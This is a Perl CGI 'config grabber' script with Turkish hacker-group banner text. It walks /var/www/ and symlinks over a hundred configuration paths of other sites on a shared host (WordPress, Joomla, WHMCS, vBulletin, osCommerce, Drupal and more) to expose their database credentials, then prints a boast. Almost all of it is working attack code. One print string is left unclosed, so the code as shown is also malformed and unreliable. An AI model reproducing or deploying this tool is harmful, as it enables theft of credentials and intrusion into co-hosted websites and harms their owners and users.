#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Darkfeyz WWW Dizini Config Çekici</title>
<style type="text/css">
.newStyle1 {
 font-family: Tahoma;
 font-size: x-large;
 color: white;
 background-color: black;
 text-align: center;
}
</style>
</head>
';


print '
<body class="newStyle1">
<div style="color:white;font:11pt tahoma;">Biz <font color=red> Kimmiyiz ? </font></font></div>
<div style="color:white;font:11pt tahoma;">Bir Avuc <font color=red> intikam </font> atesiyle yanip tutusan dostlariz..</font></div>
opendir(my $dir , "/var/www/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-wp13.txt');
symlink('/var/www/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-wp13-wp.txt');
symlink('/var/www/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-wp13-WP.txt');
symlink('/var/www/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-wp13-wp-beta.txt');
symlink('/var/www/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-wp13-beta.txt');
symlink('/var/www/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wp13-wordpress.txt');
symlink('/var/www/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-wp13-Wordpress.txt');
symlink('/var/www/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-wp13-Wordpress.txt');
symlink('/var/www/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-wp13-wordpress-beta.txt');
symlink('/var/www/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-wp13-news.txt');
symlink('/var/www/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-wp13-new.txt');
symlink('/var/www/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-wp-blog.txt');
symlink('/var/www/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-wp-beta.txt');
symlink('/var/www/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-wp-blogs.txt');
symlink('/var/www/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-wp-home.txt');
symlink('/var/www/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-wp-protal.txt');
symlink('/var/www/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-wp-site.txt');
symlink('/var/www/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-wp-main.txt');
symlink('/var/www/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-wp-test.txt');
symlink('/var/www/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/'.$sitess.'/httpdocs/includes/config.php',$sitess.'-includes-vb.txt');
symlink('/var/www/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/'.$sitess.'/httpdocs/includes/config.php',$sitess.'-traidnt1.txt');
symlink('/var/www/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hostbills/includes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/'.$sitess.'/httpdocs/hostbill/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
}
print "<br><br><br><font color=red>Bah hele zulayı patlattık dayı <img src='http://i.hizliresim.com/bDq5Rn.jpg'  height='300' width='250'></font>";
